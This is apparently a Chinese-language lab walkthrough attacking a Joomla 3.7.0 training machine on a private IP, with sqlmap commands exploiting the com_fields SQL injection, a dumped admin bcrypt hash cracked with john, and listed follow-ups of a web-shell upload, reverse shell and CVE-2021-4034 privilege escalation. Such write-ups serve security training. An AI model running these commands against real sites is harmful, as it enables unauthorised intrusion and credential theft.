发现CMS为joomla找一下后台

joomscan 

[+] admin finder                                                             
[++] Admin page : http://192.168.88.139/administrator/  

“searchsploit”是一个用于Exploit-DB的命令行搜索工具,可以帮助我们查找渗透模块,Kali Linux中保存了一个Exploit-DB漏洞库的拷贝,主要是在没有网络的情况下也可以使用,searchsploit+可能包含漏洞的软件/系统等等

└─$ searchsploit joomla 3.7.0      
------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - C | php/webapps/43488.txt
------------------------------------------- ---------------------------------
Shellcodes: No Results

然后

─$ searchsploit -p 42033    
  Exploit: Joomla! 3.7.0 - 'com_fields' SQL Injection
      URL: https://www.exploit-db.com/exploits/42033
     Path: /usr/share/exploitdb/exploits/php/webapps/42033.txt
File Type: ASCII text

查看详细信息利用一下给出的payload

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

 

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -T "#__users" --columns

这里爆破一下

do you want to use common column existence check? [y/N/q] y
[23:05:08] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
which common columns (wordlist) file do you want to use?
[1] default '/usr/share/sqlmap/data/txt/common-columns.txt' (press Enter)
[2] custom
> 10
#选择线程

爆破成功

Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email    | non-numeric |
| id       | numeric     |
| name     | non-numeric |
| params   | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+

sqlmap -u "http://192.168.88.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C username,password --dump


+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+

保存密码

用john给密码哈希值解密

┌──(root㉿kali)-[/usr/share/wordlists]
└─# vim pass.txt
                                                                             
┌──(root㉿kali)-[/usr/share/wordlists]
└─# john --wordlist=rockyou.txt pass.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
snoopy           (?)     
1g 0:00:00:01 DONE (2022-12-08 03:52) 0.9523g/s 137.1p/s 137.1c/s 137.1C/s shadow..sandra
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

得知密码为snoopy ——》登陆后台

翻一下网页在templates中发现一个文件上传点

1 直接上传一句话+蚁剑连接

2 反弹shell

3 msf

利用漏洞提权

查看操作系统 uname -a / lsb_release -a

CVE-2021-4034 漏洞exp